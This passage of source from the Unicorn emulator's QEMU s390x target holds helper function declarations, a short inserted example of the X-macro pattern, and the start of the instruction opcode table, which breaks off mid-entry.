DEF_HELPER_FLAGS_6(gvec_vfms64s, TCG_CALL_NO_WG, void, ptr, cptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vfsq64, TCG_CALL_NO_WG, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vfsq64s, TCG_CALL_NO_WG, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_5(gvec_vfs64, TCG_CALL_NO_WG, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_5(gvec_vfs64s, TCG_CALL_NO_WG, void, ptr, cptr, cptr, env, i32) DEF_HELPER_4(gvec_vftci64, void, ptr, cptr, env, i32) DEF_HELPER_4(gvec_vftci64s, void, ptr, cptr, env, i32) #ifndef CONFIG_USER_ONLY DEF_HELPER_3(servc, i32, env, i64, i64) DEF_HELPER_4(diag, void, env, i32, i32, i32) DEF_HELPER_3(load_psw, noreturn, env, i64, i64) DEF_HELPER_FLAGS_2(spx, TCG_CALL_NO_RWG, void, env, i64) DEF_HELPER_FLAGS_2(sck, TCG_CALL_NO_RWG, i32, env, i64) DEF_HELPER_FLAGS_2(sckc, TCG_CALL_NO_RWG, void, env, i64) DEF_HELPER_FLAGS_2(sckpf, TCG_CALL_NO_RWG, void, env, i64) DEF_HELPER_FLAGS_1(stckc, TCG_CALL_NO_RWG, i64, env) DEF_HELPER_FLAGS_2(spt, TCG_CALL_NO_RWG, void, env, i64) DEF_HELPER_4(stsi, i32, env, i64, i64, i64) DEF_HELPER_FLAGS_4(lctl, TCG_CALL_NO_WG, void, env, i32, i64, i32) DEF_HELPER_FLAGS_4(lctlg, TCG_CALL_NO_WG, void, env, i32, i64, i32) DEF_HELPER_FLAGS_4(stctl, TCG_CALL_NO_WG, void, env, i32, i64, i32) DEF_HELPER_FLAGS_4(stctg, TCG_CALL_NO_WG, void, env, i32, i64, i32) DEF_HELPER_FLAGS_2(testblock, TCG_CALL_NO_WG, i32, env, i64) DEF_HELPER_FLAGS_3(tprot, TCG_CALL_NO_WG, i32, env, i64, i64) DEF_HELPER_FLAGS_2(iske, TCG_CALL_NO_RWG_SE, i64, env, i64) DEF_HELPER_FLAGS_3(sske, TCG_CALL_NO_RWG, void, env, i64, i64) DEF_HELPER_FLAGS_2(rrbe, TCG_CALL_NO_RWG, i32, env, i64) DEF_HELPER_4(mvcs, i32, env, i64, i64, i64) DEF_HELPER_4(mvcp, i32, env, i64, i64, i64) DEF_HELPER_4(sigp, i32, env, i64, i32, i32) DEF_HELPER_FLAGS_2(sacf, TCG_CALL_NO_WG, void, env, i64) DEF_HELPER_FLAGS_4(idte, TCG_CALL_NO_RWG, void, env, i64, i64, i32) DEF_HELPER_FLAGS_4(ipte, TCG_CALL_NO_RWG, void, env, i64, i64, i32) DEF_HELPER_FLAGS_1(ptlb, TCG_CALL_NO_RWG, void, env) DEF_HELPER_FLAGS_1(purge, TCG_CALL_NO_RWG, void, env) DEF_HELPER_2(lra, i64, env, i64) DEF_HELPER_1(per_check_exception, void, env) DEF_HELPER_FLAGS_3(per_branch, TCG_CALL_NO_RWG, void, env, i64, i64) DEF_HELPER_FLAGS_2(per_ifetch, TCG_CALL_NO_RWG, void, env, i64) DEF_HELPER_FLAGS_1(per_store_real, TCG_CALL_NO_RWG, void, env) DEF_HELPER_FLAGS_1(stfl, TCG_CALL_NO_RWG, void, env) DEF_HELPER_2(xsch, void, env, i64) DEF_HELPER_2(csch, void, env, i64) DEF_HELPER_2(hsch, void, env, i64) DEF_HELPER_3(msch, void, env, i64, i64) DEF_HELPER_2(rchp, void, env, i64) DEF_HELPER_2(rsch, void, env, i64) DEF_HELPER_2(sal, void, env, i64) DEF_HELPER_4(schm, void, env, i64, i64, i64) DEF_HELPER_3(ssch, void, env, i64, i64) DEF_HELPER_2(stcrw, void, env, i64) DEF_HELPER_3(stsch, void, env, i64, i64) DEF_HELPER_2(tpi, i32, env, i64) DEF_HELPER_3(tsch, void, env, i64, i64) DEF_HELPER_2(chsc, void, env, i64) DEF_HELPER_2(clp, void, env, i32) DEF_HELPER_3(pcilg, void, env, i32, i32) DEF_HELPER_3(pcistg, void, env, i32, i32) DEF_HELPER_4(stpcifc, void, env, i32, i64, i32) DEF_HELPER_3(sic, void, env, i64, i64) DEF_HELPER_3(rpcit, void, env, i32, i32) DEF_HELPER_5(pcistb, void, env, i32, i32, i64, i32) DEF_HELPER_4(mpcifc, void, env, i32, i64, i32) #endif 
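/*
 * Editor's note (illustration, not part of the original sources): the
 * helper declarations above and the insn-data.def table that follows are
 * X-macro files. They deliberately have no include guards, because the
 * build #includes them more than once, redefining DEF_HELPER_* (or the
 * C/D/E/F entry macros) before each pass to stamp out prototypes, call
 * tables, and similar artifacts from a single list. Below is a minimal,
 * self-contained sketch of that pattern; every name in it (HELPER_TABLE,
 * DEF_PROTO, DEF_INFO, helper_add32, ...) is invented for this example
 * and does not exist in QEMU or Unicorn.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Stand-in for a .def/.h table file: one entry per helper, no guards. */
#define HELPER_TABLE(DEF)                      \
    DEF(add32, uint32_t, uint32_t, uint32_t)   \
    DEF(sub32, uint32_t, uint32_t, uint32_t)

/* Pass 1: expand each entry into a function prototype. */
#define DEF_PROTO(NAME, RET, T1, T2) static RET helper_##NAME(T1 a, T2 b);
HELPER_TABLE(DEF_PROTO)
#undef DEF_PROTO

/* Pass 2: expand the same entries into a name table (e.g. for dispatch). */
struct helper_info {
    const char *name;
};
#define DEF_INFO(NAME, RET, T1, T2) { #NAME },
static const struct helper_info helpers[] = { HELPER_TABLE(DEF_INFO) };
#undef DEF_INFO

static uint32_t helper_add32(uint32_t a, uint32_t b) { return a + b; }
static uint32_t helper_sub32(uint32_t a, uint32_t b) { return a - b; }

int main(void)
{
    /* Walk the generated table, then call the generated helpers. */
    for (size_t i = 0; i < sizeof(helpers) / sizeof(helpers[0]); i++) {
        printf("helper: %s\n", helpers[i].name);
    }
    printf("add32(2, 3) = %u, sub32(5, 2) = %u\n",
           (unsigned)helper_add32(2, 3), (unsigned)helper_sub32(5, 2));
    return 0;
}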
unicorn-2.1.1/qemu/target/s390x/insn-data.def000066400000000000000000002115531467524106700206740ustar00rootroot00000000000000/*
 * Arguments to the opcode prototypes
 *
 * C(OPC, NAME, FMT, FAC, I1, I2, P, W, OP, CC)
 * D(OPC, NAME, FMT, FAC, I1, I2, P, W, OP, CC, DATA)
 * E(OPC, NAME, FMT, FAC, I1, I2, P, W, OP, CC, DATA, FLAGS)
 * F(OPC, NAME, FMT, FAC, I1, I2, P, W, OP, CC, FLAGS)
 *
 * OPC = (op << 8) | op2 where op is the major, op2 the minor opcode
 * NAME = name of the opcode, used internally
 * FMT = format of the opcode (defined in insn-format.def)
 * FAC = facility the opcode is available in (defined in DisasFacility)
 * I1 = func in1_xx fills o->in1
 * I2 = func in2_xx fills o->in2
 * P = func prep_xx initializes o->*out*
 * W = func wout_xx writes o->*out* somewhere
 * OP = func op_xx does the bulk of the operation
 * CC = func cout_xx defines how cc should get set
 * DATA = immediate argument to op_xx function
 * FLAGS = categorize the type of instruction (e.g. for advanced checks)
 *
 * The helpers get called in order: I1, I2, P, OP, W, CC
 */
/* ADD */ C(0x1a00, AR, RR_a, Z, r1, r2, new, r1_32, add, adds32) C(0xb9f8, ARK, RRF_a, DO, r2, r3, new, r1_32, add, adds32) C(0x5a00, A, RX_a, Z, r1, m2_32s, new, r1_32, add, adds32) C(0xe35a, AY, RXY_a, LD, r1, m2_32s, new, r1_32, add, adds32) C(0xb908, AGR, RRE, Z, r1, r2, r1, 0, add, adds64) C(0xb918, AGFR, RRE, Z, r1, r2_32s, r1, 0, add, adds64) C(0xb9e8, AGRK, RRF_a, DO, r2, r3, r1, 0, add, adds64) C(0xe308, AG, RXY_a, Z, r1, m2_64, r1, 0, add, adds64) C(0xe318, AGF, RXY_a, Z, r1, m2_32s, r1, 0, add, adds64) F(0xb30a, AEBR, RRE, Z, e1, e2, new, e1, aeb, f32, IF_BFP) F(0xb31a, ADBR, RRE, Z, f1, f2, new, f1, adb, f64, IF_BFP) F(0xb34a, AXBR, RRE, Z, x2h, x2l, x1, x1, axb, f128, IF_BFP) F(0xed0a, AEB, RXE, Z, e1, m2_32u, new, e1, aeb, f32, IF_BFP) F(0xed1a, ADB, RXE, Z, f1, m2_64, new, f1, adb, f64, IF_BFP) /* ADD HIGH */ C(0xb9c8, AHHHR, RRF_a, HW, r2_sr32, r3_sr32, new, r1_32h, add, adds32) C(0xb9d8, AHHLR, RRF_a, HW, r2_sr32, r3, new, r1_32h, add, adds32) /* ADD IMMEDIATE */ C(0xc209, AFI, RIL_a, EI, r1, i2, new, r1_32, add, adds32) D(0xeb6a, ASI, SIY, GIE, la1, i2, new, 0, asi, adds32, MO_TESL) C(0xecd8, AHIK, RIE_d, DO, r3, i2, new, r1_32, add, adds32) C(0xc208, AGFI, RIL_a, EI, r1, i2, r1, 0, add, adds64) D(0xeb7a, AGSI, SIY, GIE, la1, i2, new, 0, asi, adds64, MO_TEQ) C(0xecd9, AGHIK, RIE_d, DO, r3, i2, r1, 0, add, adds64) /* ADD IMMEDIATE HIGH */ C(0xcc08, AIH, RIL_a, HW, r1_sr32, i2, new, r1_32h, add, adds32) /* ADD HALFWORD */ C(0x4a00, AH, RX_a, Z, r1, m2_16s, new, r1_32, add, adds32) C(0xe37a, AHY, RXY_a, LD, r1, m2_16s, new, r1_32, add, adds32) /* ADD HALFWORD IMMEDIATE */ C(0xa70a, AHI, RI_a, Z, r1, i2, new, r1_32, add, adds32) C(0xa70b, AGHI, RI_a, Z, r1, i2, r1, 0, add, adds64) /* ADD LOGICAL */ C(0x1e00, ALR, RR_a, Z, r1, r2, new, r1_32, add, addu32) C(0xb9fa, ALRK, RRF_a, DO, r2, r3, new, r1_32, add, addu32) C(0x5e00, AL, RX_a, Z, r1, m2_32u, new, r1_32, add, addu32) C(0xe35e, ALY, RXY_a, LD, r1, m2_32u, new, r1_32, add, addu32) C(0xb90a, ALGR, RRE, Z, r1, r2, r1, 0, add, addu64) C(0xb91a, ALGFR,
RRE, Z, r1, r2_32u, r1, 0, add, addu64) C(0xb9ea, ALGRK, RRF_a, DO, r2, r3, r1, 0, add, addu64) C(0xe30a, ALG, RXY_a, Z, r1, m2_64, r1, 0, add, addu64) C(0xe31a, ALGF, RXY_a, Z, r1, m2_32u, r1, 0, add, addu64) /* ADD LOGICAL HIGH */ C(0xb9ca, ALHHHR, RRF_a, HW, r2_sr32, r3_sr32, new, r1_32h, add, addu32) C(0xb9da, ALHHLR, RRF_a, HW, r2_sr32, r3, new, r1_32h, add, addu32) /* ADD LOGICAL IMMEDIATE */ C(0xc20b, ALFI, RIL_a, EI, r1, i2_32u, new, r1_32, add, addu32) C(0xc20a, ALGFI, RIL_a, EI, r1, i2_32u, r1, 0, add, addu64) /* ADD LOGICAL WITH SIGNED IMMEDIATE */ D(0xeb6e, ALSI, SIY, GIE, la1, i2, new, 0, asi, addu32, MO_TEUL) C(0xecda, ALHSIK, RIE_d, DO, r3, i2, new, r1_32, add, addu32) D(0xeb7e, ALGSI, SIY, GIE, la1, i2, new, 0, asi, addu64, MO_TEQ) C(0xecdb, ALGHSIK, RIE_d, DO, r3, i2, r1, 0, add, addu64) /* ADD LOGICAL WITH SIGNED IMMEDIATE HIGH */ C(0xcc0a, ALSIH, RIL_a, HW, r1_sr32, i2, new, r1_32h, add, addu32) C(0xcc0b, ALSIHN, RIL_a, HW, r1_sr32, i2, new, r1_32h, add, 0) /* ADD LOGICAL WITH CARRY */ C(0xb998, ALCR, RRE, Z, r1, r2, new, r1_32, addc, addc32) C(0xb988, ALCGR, RRE, Z, r1, r2, r1, 0, addc, addc64) C(0xe398, ALC, RXY_a, Z, r1, m2_32u, new, r1_32, addc, addc32) C(0xe388, ALCG, RXY_a, Z, r1, m2_64, r1, 0, addc, addc64) /* AND */ C(0x1400, NR, RR_a, Z, r1, r2, new, r1_32, and, nz32) C(0xb9f4, NRK, RRF_a, DO, r2, r3, new, r1_32, and, nz32) C(0x5400, N, RX_a, Z, r1, m2_32s, new, r1_32, and, nz32) C(0xe354, NY, RXY_a, LD, r1, m2_32s, new, r1_32, and, nz32) C(0xb980, NGR, RRE, Z, r1, r2, r1, 0, and, nz64) C(0xb9e4, NGRK, RRF_a, DO, r2, r3, r1, 0, and, nz64) C(0xe380, NG, RXY_a, Z, r1, m2_64, r1, 0, and, nz64) C(0xd400, NC, SS_a, Z, la1, a2, 0, 0, nc, 0) /* AND IMMEDIATE */ D(0xc00a, NIHF, RIL_a, EI, r1_o, i2_32u, r1, 0, andi, 0, 0x2020) D(0xc00b, NILF, RIL_a, EI, r1_o, i2_32u, r1, 0, andi, 0, 0x2000) D(0xa504, NIHH, RI_a, Z, r1_o, i2_16u, r1, 0, andi, 0, 0x1030) D(0xa505, NIHL, RI_a, Z, r1_o, i2_16u, r1, 0, andi, 0, 0x1020) D(0xa506, NILH, RI_a, Z, r1_o, i2_16u, r1, 0, andi, 0, 0x1010) D(0xa507, NILL, RI_a, Z, r1_o, i2_16u, r1, 0, andi, 0, 0x1000) D(0x9400, NI, SI, Z, la1, i2_8u, new, 0, ni, nz64, MO_UB) D(0xeb54, NIY, SIY, LD, la1, i2_8u, new, 0, ni, nz64, MO_UB) /* BRANCH AND LINK */ C(0x0500, BALR, RR_a, Z, 0, r2_nz, r1, 0, bal, 0) C(0x4500, BAL, RX_a, Z, 0, a2, r1, 0, bal, 0) /* BRANCH AND SAVE */ C(0x0d00, BASR, RR_a, Z, 0, r2_nz, r1, 0, bas, 0) C(0x4d00, BAS, RX_a, Z, 0, a2, r1, 0, bas, 0) /* BRANCH RELATIVE AND SAVE */ C(0xa705, BRAS, RI_b, Z, 0, 0, r1, 0, basi, 0) C(0xc005, BRASL, RIL_b, Z, 0, 0, r1, 0, basi, 0) /* BRANCH ON CONDITION */ C(0x0700, BCR, RR_b, Z, 0, r2_nz, 0, 0, bc, 0) C(0x4700, BC, RX_b, Z, 0, a2, 0, 0, bc, 0) /* BRANCH RELATIVE ON CONDITION */ C(0xa704, BRC, RI_c, Z, 0, 0, 0, 0, bc, 0) C(0xc004, BRCL, RIL_c, Z, 0, 0, 0, 0, bc, 0) /* BRANCH ON COUNT */ C(0x0600, BCTR, RR_a, Z, 0, r2_nz, 0, 0, bct32, 0) C(0xb946, BCTGR, RRE, Z, 0, r2_nz, 0, 0, bct64, 0) C(0x4600, BCT, RX_a, Z, 0, a2, 0, 0, bct32, 0) C(0xe346, BCTG, RXY_a, Z, 0, a2, 0, 0, bct64, 0) /* BRANCH RELATIVE ON COUNT */ C(0xa706, BRCT, RI_b, Z, 0, 0, 0, 0, bct32, 0) C(0xa707, BRCTG, RI_b, Z, 0, 0, 0, 0, bct64, 0) /* BRANCH RELATIVE ON COUNT HIGH */ C(0xcc06, BRCTH, RIL_b, HW, 0, 0, 0, 0, bcth, 0) /* BRANCH ON INDEX */ D(0x8600, BXH, RS_a, Z, 0, a2, 0, 0, bx32, 0, 0) D(0x8700, BXLE, RS_a, Z, 0, a2, 0, 0, bx32, 0, 1) D(0xeb44, BXHG, RSY_a, Z, 0, a2, 0, 0, bx64, 0, 0) D(0xeb45, BXLEG, RSY_a, Z, 0, a2, 0, 0, bx64, 0, 1) /* BRANCH RELATIVE ON INDEX */ D(0x8400, BRXH, RSI, Z, 0, 0, 0, 0, bx32, 0, 0) 
D(0x8500, BRXLE, RSI, Z, 0, 0, 0, 0, bx32, 0, 1) D(0xec44, BRXHG, RIE_e, Z, 0, 0, 0, 0, bx64, 0, 0) D(0xec45, BRXHLE, RIE_e, Z, 0, 0, 0, 0, bx64, 0, 1) /* BRANCH PREDICTION PRELOAD */ /* ??? Format is SMI, but implemented as NOP, so we need no fields. */ C(0xc700, BPP, E, EH, 0, 0, 0, 0, 0, 0) /* BRANCH PREDICTION RELATIVE PRELOAD */ /* ??? Format is MII, but implemented as NOP, so we need no fields. */ C(0xc500, BPRP, E, EH, 0, 0, 0, 0, 0, 0) /* NEXT INSTRUCTION ACCESS INTENT */ /* ??? Format is IE, but implemented as NOP, so we need no fields. */ C(0xb2fa, NIAI, E, EH, 0, 0, 0, 0, 0, 0) /* CHECKSUM */ C(0xb241, CKSM, RRE, Z, r1_o, ra2, new, r1_32, cksm, 0) /* COPY SIGN */ F(0xb372, CPSDR, RRF_b, FPSSH, f3, f2, new, f1, cps, 0, IF_AFP1 | IF_AFP2 | IF_AFP3) /* COMPARE */ C(0x1900, CR, RR_a, Z, r1_o, r2_o, 0, 0, 0, cmps32) C(0x5900, C, RX_a, Z, r1_o, m2_32s, 0, 0, 0, cmps32) C(0xe359, CY, RXY_a, LD, r1_o, m2_32s, 0, 0, 0, cmps32) C(0xb920, CGR, RRE, Z, r1_o, r2_o, 0, 0, 0, cmps64) C(0xb930, CGFR, RRE, Z, r1_o, r2_32s, 0, 0, 0, cmps64) C(0xe320, CG, RXY_a, Z, r1_o, m2_64, 0, 0, 0, cmps64) C(0xe330, CGF, RXY_a, Z, r1_o, m2_32s, 0, 0, 0, cmps64) F(0xb309, CEBR, RRE, Z, e1, e2, 0, 0, ceb, 0, IF_BFP) F(0xb319, CDBR, RRE, Z, f1, f2, 0, 0, cdb, 0, IF_BFP) F(0xb349, CXBR, RRE, Z, x2h, x2l, x1, 0, cxb, 0, IF_BFP) F(0xed09, CEB, RXE, Z, e1, m2_32u, 0, 0, ceb, 0, IF_BFP) F(0xed19, CDB, RXE, Z, f1, m2_64, 0, 0, cdb, 0, IF_BFP) /* COMPARE AND SIGNAL */ F(0xb308, KEBR, RRE, Z, e1, e2, 0, 0, keb, 0, IF_BFP) F(0xb318, KDBR, RRE, Z, f1, f2, 0, 0, kdb, 0, IF_BFP) F(0xb348, KXBR, RRE, Z, x2h, x2l, x1, 0, kxb, 0, IF_BFP) F(0xed08, KEB, RXE, Z, e1, m2_32u, 0, 0, keb, 0, IF_BFP) F(0xed18, KDB, RXE, Z, f1, m2_64, 0, 0, kdb, 0, IF_BFP) /* COMPARE IMMEDIATE */ C(0xc20d, CFI, RIL_a, EI, r1, i2, 0, 0, 0, cmps32) C(0xc20c, CGFI, RIL_a, EI, r1, i2, 0, 0, 0, cmps64) /* COMPARE RELATIVE LONG */ C(0xc60d, CRL, RIL_b, GIE, r1, mri2_32s, 0, 0, 0, cmps32) C(0xc608, CGRL, RIL_b, GIE, r1, mri2_64, 0, 0, 0, cmps64) C(0xc60c, CGFRL, RIL_b, GIE, r1, mri2_32s, 0, 0, 0, cmps64) /* COMPARE HALFWORD */ C(0x4900, CH, RX_a, Z, r1_o, m2_16s, 0, 0, 0, cmps32) C(0xe379, CHY, RXY_a, LD, r1_o, m2_16s, 0, 0, 0, cmps32) C(0xe334, CGH, RXY_a, GIE, r1_o, m2_16s, 0, 0, 0, cmps64) /* COMPARE HALFWORD IMMEDIATE */ C(0xa70e, CHI, RI_a, Z, r1_o, i2, 0, 0, 0, cmps32) C(0xa70f, CGHI, RI_a, Z, r1_o, i2, 0, 0, 0, cmps64) C(0xe554, CHHSI, SIL, GIE, m1_16s, i2, 0, 0, 0, cmps64) C(0xe55c, CHSI, SIL, GIE, m1_32s, i2, 0, 0, 0, cmps64) C(0xe558, CGHSI, SIL, GIE, m1_64, i2, 0, 0, 0, cmps64) /* COMPARE HALFWORD RELATIVE LONG */ C(0xc605, CHRL, RIL_b, GIE, r1_o, mri2_32s, 0, 0, 0, cmps32) C(0xc604, CGHRL, RIL_b, GIE, r1_o, mri2_64, 0, 0, 0, cmps64) /* COMPARE HIGH */ C(0xb9cd, CHHR, RRE, HW, r1_sr32, r2_sr32, 0, 0, 0, cmps32) C(0xb9dd, CHLR, RRE, HW, r1_sr32, r2_o, 0, 0, 0, cmps32) C(0xe3cd, CHF, RXY_a, HW, r1_sr32, m2_32s, 0, 0, 0, cmps32) /* COMPARE IMMEDIATE HIGH */ C(0xcc0d, CIH, RIL_a, HW, r1_sr32, i2, 0, 0, 0, cmps32) /* COMPARE LOGICAL */ C(0x1500, CLR, RR_a, Z, r1, r2, 0, 0, 0, cmpu32) C(0x5500, CL, RX_a, Z, r1, m2_32s, 0, 0, 0, cmpu32) C(0xe355, CLY, RXY_a, LD, r1, m2_32s, 0, 0, 0, cmpu32) C(0xb921, CLGR, RRE, Z, r1, r2, 0, 0, 0, cmpu64) C(0xb931, CLGFR, RRE, Z, r1, r2_32u, 0, 0, 0, cmpu64) C(0xe321, CLG, RXY_a, Z, r1, m2_64, 0, 0, 0, cmpu64) C(0xe331, CLGF, RXY_a, Z, r1, m2_32u, 0, 0, 0, cmpu64) C(0xd500, CLC, SS_a, Z, la1, a2, 0, 0, clc, 0) /* COMPARE LOGICAL HIGH */ C(0xb9cf, CLHHR, RRE, HW, r1_sr32, r2_sr32, 0, 0, 0, cmpu32) C(0xb9df, CLHLR, RRE, 
HW, r1_sr32, r2_o, 0, 0, 0, cmpu32) C(0xe3cf, CLHF, RXY_a, HW, r1_sr32, m2_32s, 0, 0, 0, cmpu32) /* COMPARE LOGICAL IMMEDIATE */ C(0xc20f, CLFI, RIL_a, EI, r1, i2, 0, 0, 0, cmpu32) C(0xc20e, CLGFI, RIL_a, EI, r1, i2_32u, 0, 0, 0, cmpu64) C(0x9500, CLI, SI, Z, m1_8u, i2_8u, 0, 0, 0, cmpu64) C(0xeb55, CLIY, SIY, LD, m1_8u, i2_8u, 0, 0, 0, cmpu64) C(0xe555, CLHHSI, SIL, GIE, m1_16u, i2_16u, 0, 0, 0, cmpu64) C(0xe55d, CLFHSI, SIL, GIE, m1_32u, i2_16u, 0, 0, 0, cmpu64) C(0xe559, CLGHSI, SIL, GIE, m1_64, i2_16u, 0, 0, 0, cmpu64) /* COMPARE LOGICAL IMMEDIATE HIGH */ C(0xcc0f, CLIH, RIL_a, HW, r1_sr32, i2, 0, 0, 0, cmpu32) /* COMPARE LOGICAL RELATIVE LONG */ C(0xc60f, CLRL, RIL_b, GIE, r1_o, mri2_32u, 0, 0, 0, cmpu32) C(0xc60a, CLGRL, RIL_b, GIE, r1_o, mri2_64, 0, 0, 0, cmpu64) C(0xc60e, CLGFRL, RIL_b, GIE, r1_o, mri2_32u, 0, 0, 0, cmpu64) C(0xc607, CLHRL, RIL_b, GIE, r1_o, mri2_16u, 0, 0, 0, cmpu32) C(0xc606, CLGHRL, RIL_b, GIE, r1_o, mri2_16u, 0, 0, 0, cmpu64) /* COMPARE LOGICAL LONG */ C(0x0f00, CLCL, RR_a, Z, 0, 0, 0, 0, clcl, 0) /* COMPARE LOGICAL LONG EXTENDED */ C(0xa900, CLCLE, RS_a, Z, 0, a2, 0, 0, clcle, 0) /* COMPARE LOGICAL LONG UNICODE */ C(0xeb8f, CLCLU, RSY_a, E2, 0, a2, 0, 0, clclu, 0) /* COMPARE LOGICAL CHARACTERS UNDER MASK */ C(0xbd00, CLM, RS_b, Z, r1_o, a2, 0, 0, clm, 0) C(0xeb21, CLMY, RSY_b, LD, r1_o, a2, 0, 0, clm, 0) C(0xeb20, CLMH, RSY_b, Z, r1_sr32, a2, 0, 0, clm, 0) /* COMPARE LOGICAL STRING */ C(0xb25d, CLST, RRE, Z, r1_o, r2_o, 0, 0, clst, 0) /* COMPARE AND BRANCH */ D(0xecf6, CRB, RRS, GIE, r1_32s, r2_32s, 0, 0, cj, 0, 0) D(0xece4, CGRB, RRS, GIE, r1_o, r2_o, 0, 0, cj, 0, 0) D(0xec76, CRJ, RIE_b, GIE, r1_32s, r2_32s, 0, 0, cj, 0, 0) D(0xec64, CGRJ, RIE_b, GIE, r1_o, r2_o, 0, 0, cj, 0, 0) D(0xecfe, CIB, RIS, GIE, r1_32s, i2, 0, 0, cj, 0, 0) D(0xecfc, CGIB, RIS, GIE, r1_o, i2, 0, 0, cj, 0, 0) D(0xec7e, CIJ, RIE_c, GIE, r1_32s, i2, 0, 0, cj, 0, 0) D(0xec7c, CGIJ, RIE_c, GIE, r1_o, i2, 0, 0, cj, 0, 0) /* COMPARE LOGICAL AND BRANCH */ D(0xecf7, CLRB, RRS, GIE, r1_32u, r2_32u, 0, 0, cj, 0, 1) D(0xece5, CLGRB, RRS, GIE, r1_o, r2_o, 0, 0, cj, 0, 1) D(0xec77, CLRJ, RIE_b, GIE, r1_32u, r2_32u, 0, 0, cj, 0, 1) D(0xec65, CLGRJ, RIE_b, GIE, r1_o, r2_o, 0, 0, cj, 0, 1) D(0xecff, CLIB, RIS, GIE, r1_32u, i2_8u, 0, 0, cj, 0, 1) D(0xecfd, CLGIB, RIS, GIE, r1_o, i2_8u, 0, 0, cj, 0, 1) D(0xec7f, CLIJ, RIE_c, GIE, r1_32u, i2_8u, 0, 0, cj, 0, 1) D(0xec7d, CLGIJ, RIE_c, GIE, r1_o, i2_8u, 0, 0, cj, 0, 1) /* COMPARE AND SWAP */ D(0xba00, CS, RS_a, Z, r3_32u, r1_32u, new, r1_32, cs, 0, MO_TEUL) D(0xeb14, CSY, RSY_a, LD, r3_32u, r1_32u, new, r1_32, cs, 0, MO_TEUL) D(0xeb30, CSG, RSY_a, Z, r3_o, r1_o, new, r1, cs, 0, MO_TEQ) /* COMPARE DOUBLE AND SWAP */ D(0xbb00, CDS, RS_a, Z, r3_D32, r1_D32, new, r1_D32, cs, 0, MO_TEQ) D(0xeb31, CDSY, RSY_a, LD, r3_D32, r1_D32, new, r1_D32, cs, 0, MO_TEQ) C(0xeb3e, CDSG, RSY_a, Z, 0, 0, 0, 0, cdsg, 0) /* COMPARE AND SWAP AND STORE */ C(0xc802, CSST, SSF, CASS, la1, a2, 0, 0, csst, 0) /* COMPARE AND TRAP */ D(0xb972, CRT, RRF_c, GIE, r1_32s, r2_32s, 0, 0, ct, 0, 0) D(0xb960, CGRT, RRF_c, GIE, r1_o, r2_o, 0, 0, ct, 0, 0) D(0xec72, CIT, RIE_a, GIE, r1_32s, i2, 0, 0, ct, 0, 0) D(0xec70, CGIT, RIE_a, GIE, r1_o, i2, 0, 0, ct, 0, 0) /* COMPARE LOGICAL AND TRAP */ D(0xb973, CLRT, RRF_c, GIE, r1_32u, r2_32u, 0, 0, ct, 0, 1) D(0xb961, CLGRT, RRF_c, GIE, r1_o, r2_o, 0, 0, ct, 0, 1) D(0xeb23, CLT, RSY_b, MIE, r1_32u, m2_32u, 0, 0, ct, 0, 1) D(0xeb2b, CLGT, RSY_b, MIE, r1_o, m2_64, 0, 0, ct, 0, 1) D(0xec73, CLFIT, RIE_a, GIE, r1_32u, i2_32u, 0, 0, ct, 0, 1) D(0xec71, 
CLGIT, RIE_a, GIE, r1_o, i2_32u, 0, 0, ct, 0, 1) /* CONVERT TO DECIMAL */ C(0x4e00, CVD, RX_a, Z, r1_o, a2, 0, 0, cvd, 0) C(0xe326, CVDY, RXY_a, LD, r1_o, a2, 0, 0, cvd, 0) /* CONVERT TO FIXED */ F(0xb398, CFEBR, RRF_e, Z, 0, e2, new, r1_32, cfeb, 0, IF_BFP) F(0xb399, CFDBR, RRF_e, Z, 0, f2, new, r1_32, cfdb, 0, IF_BFP) F(0xb39a, CFXBR, RRF_e, Z, x2h, x2l, new, r1_32, cfxb, 0, IF_BFP) F(0xb3a8, CGEBR, RRF_e, Z, 0, e2, r1, 0, cgeb, 0, IF_BFP) F(0xb3a9, CGDBR, RRF_e, Z, 0, f2, r1, 0, cgdb, 0, IF_BFP) F(0xb3aa, CGXBR, RRF_e, Z, x2h, x2l, r1, 0, cgxb, 0, IF_BFP) /* CONVERT FROM FIXED */ F(0xb394, CEFBR, RRF_e, Z, 0, r2_32s, new, e1, cegb, 0, IF_BFP) F(0xb395, CDFBR, RRF_e, Z, 0, r2_32s, new, f1, cdgb, 0, IF_BFP) F(0xb396, CXFBR, RRF_e, Z, 0, r2_32s, new_P, x1, cxgb, 0, IF_BFP) F(0xb3a4, CEGBR, RRF_e, Z, 0, r2_o, new, e1, cegb, 0, IF_BFP) F(0xb3a5, CDGBR, RRF_e, Z, 0, r2_o, new, f1, cdgb, 0, IF_BFP) F(0xb3a6, CXGBR, RRF_e, Z, 0, r2_o, new_P, x1, cxgb, 0, IF_BFP) /* CONVERT TO LOGICAL */ F(0xb39c, CLFEBR, RRF_e, FPE, 0, e2, new, r1_32, clfeb, 0, IF_BFP) F(0xb39d, CLFDBR, RRF_e, FPE, 0, f2, new, r1_32, clfdb, 0, IF_BFP) F(0xb39e, CLFXBR, RRF_e, FPE, x2h, x2l, new, r1_32, clfxb, 0, IF_BFP) F(0xb3ac, CLGEBR, RRF_e, FPE, 0, e2, r1, 0, clgeb, 0, IF_BFP) F(0xb3ad, CLGDBR, RRF_e, FPE, 0, f2, r1, 0, clgdb, 0, IF_BFP) F(0xb3ae, CLGXBR, RRF_e, FPE, x2h, x2l, r1, 0, clgxb, 0, IF_BFP) /* CONVERT FROM LOGICAL */ F(0xb390, CELFBR, RRF_e, FPE, 0, r2_32u, new, e1, celgb, 0, IF_BFP) F(0xb391, CDLFBR, RRF_e, FPE, 0, r2_32u, new, f1, cdlgb, 0, IF_BFP) F(0xb392, CXLFBR, RRF_e, FPE, 0, r2_32u, new_P, x1, cxlgb, 0, IF_BFP) F(0xb3a0, CELGBR, RRF_e, FPE, 0, r2_o, new, e1, celgb, 0, IF_BFP) F(0xb3a1, CDLGBR, RRF_e, FPE, 0, r2_o, new, f1, cdlgb, 0, IF_BFP) F(0xb3a2, CXLGBR, RRF_e, FPE, 0, r2_o, new_P, x1, cxlgb, 0, IF_BFP) /* CONVERT UTF-8 TO UTF-16 */ D(0xb2a7, CU12, RRF_c, Z, 0, 0, 0, 0, cuXX, 0, 12) /* CONVERT UTF-8 TO UTF-32 */ D(0xb9b0, CU14, RRF_c, ETF3, 0, 0, 0, 0, cuXX, 0, 